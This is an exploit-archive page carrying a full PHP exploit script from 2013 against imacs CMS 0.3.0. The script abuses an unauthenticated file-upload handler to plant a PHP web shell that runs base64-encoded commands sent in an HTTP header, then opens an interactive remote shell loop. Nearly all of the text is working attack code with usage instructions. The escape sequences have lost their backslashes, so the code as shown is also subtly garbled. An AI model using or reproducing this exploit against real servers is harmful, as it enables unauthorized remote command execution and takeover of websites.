[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : imacs CMS 0.3.0 - Unrestricted File Upload Exploit
# Published : 2013-06-19
# Author :
# Previous Title : Dell PacketTrap PSA 7.1 - Multiple XSS Vulnerabilities
# Next Title : Barracuda LB, SVF, WAF & WEF - Multiple Vulnerabilities


<?php
 
/*
 
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `   /
    / XXXXXX /______(
   / XXXXXX /        
  / XXXXXX /
 (________(          
  `------'
  
 Exploit Title   : imacs CMS Unrestricted File Upload Exploit
 Date            : 18 June 2013
 Exploit Author  : CWH Underground
 Site            : www.2600.in.th
 Vendor Homepage : http://jrcmsdev.sourceforge.net/
 Software Link   : http://jaist.dl.sourceforge.net/project/jrcmsdev/imacs_V0_3_0_608.cmp.zip
 Version         : 0.3.0
 Tested on       : Window and Linux
  
  
#####################################################
VULNERABILITY: Unrestricted File Upload 
#####################################################
  
/src/assets/mng/mng.php
 
#####################################################
DESCRIPTION
#####################################################
  
Restricted access to this script isn't properly realized (Don't require authentication) ,  
so an attacker might be able to upload arbitrary files containing malicious PHP code due to uploaded file 
extension isn't properly checked.
 

#####################################################
EXPLOIT
#####################################################
  
*/
 
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
 
function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die("n[-] No response from {$host}:80n");
  
    fputs($sock, $packet);
    return stream_get_contents($sock);
}
 
print "n==============================================n";
print "  imacs CMS Unrestricted File Upload Exploit  n";
print "                                              n";
print "        Discovered By CWH Underground         n";
print "==============================================nn";
print "  ,--^----------,--------,-----,-------^--,   n";
print "  | |||||||||   `--------'     |          O   n";
print "  `+---------------------------^----------|   n";
print "    `_,-------, _________________________|   n";
print "      / XXXXXX /`|     /                      n";
print "     / XXXXXX /  `   /                       n";
print "    / XXXXXX /______(                        n";
print "   / XXXXXX /                                 n";
print "  / XXXXXX /   .. CWH Underground Hacking Team ..  n";
print " (________(                                   n";
print "  `------'                                    nn";

  
if ($argc < 3)
{
    print "nUsage......: php $argv[0] <host> <path>n";
    print "nExample....: php $argv[0] localhost /";
    print "nExample....: php $argv[0] localhost /imacs/n";
    die();
}
 
$host = $argv[1];
$path = $argv[2];
 

$payload  = "--o0oOo0orn";
$payload .= "Content-Disposition: form-data; name="upload"; filename="sh.php"rn";
$payload .= "Content-Type: application/octet-streamrnrn";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode($_SERVER[HTTP_CMD]));rn";
$payload .= "--o0oOo0o--rn";

$packet  = "GET {$path} HTTP/1.0rn";
$packet .= "Host: {$host}rn";
$packet .= "Connection: closernrn{$payload}";

$response = http_send($host, $packet);

if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("n[-] Session ID not found!n");

$packet  = "POST {$path}src/assets/mng/mng.php?dir= HTTP/1.0rn";
$packet .= "Host: {$host}rn";
$packet .= "Cookie: {$sid[1]}rn";
$packet .= "Content-Length: ".strlen($payload)."rn";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0orn";
$packet .= "Connection: closernrn{$payload}";
     
http_send($host, $packet);
 
$packet  = "GET {$path}content/uploads/sh.php HTTP/1.0rn";
$packet .= "Host: {$host}rn";
$packet .= "Cmd: %srn";
$packet .= "Connection: closernrn";
     
while(1)
{
    print "nimacs-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("n[-] Exploit failed!n");
}

################################################################################################################
# Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
?>